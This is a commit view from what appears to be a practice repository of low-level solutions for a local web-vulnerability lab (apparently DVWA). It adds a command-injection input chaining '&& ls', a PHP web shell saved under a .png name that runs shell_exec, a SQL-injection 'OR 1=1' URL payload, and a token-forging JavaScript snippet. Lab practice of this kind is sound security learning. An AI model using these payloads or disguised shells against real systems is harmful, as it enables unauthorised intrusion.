feat: 🚧 Starting low level
This commit is contained in:
commit
de2700067e
1
Command Injection/low.bash
Normal file
1
Command Injection/low.bash
Normal file
@ -0,0 +1 @@
|
|||||||
|
127.0.0.1 && ls
|
4
File injection/file-inject-low.png
Normal file
4
File injection/file-inject-low.png
Normal file
@ -0,0 +1,4 @@
|
|||||||
|
<?php
|
||||||
|
$output = shell_exec('ls');
|
||||||
|
echo "<pre>$output</pre>";
|
||||||
|
?>
|
3
Javascript/low.js
Normal file
3
Javascript/low.js
Normal file
@ -0,0 +1,3 @@
|
|||||||
|
const phrase = document.getElementById("phrase").value;
|
||||||
|
const token = md5(rot13(phrase));
|
||||||
|
console.log(token);
|
1
SQL Injection/low.txt
Normal file
1
SQL Injection/low.txt
Normal file
@ -0,0 +1 @@
|
|||||||
|
Full url : http://localhost:4280/vulnerabilities/sqli/?id=test%27+OR+1=1--%27&Submit=Submit#
|
Loading…
x
Reference in New Issue
Block a user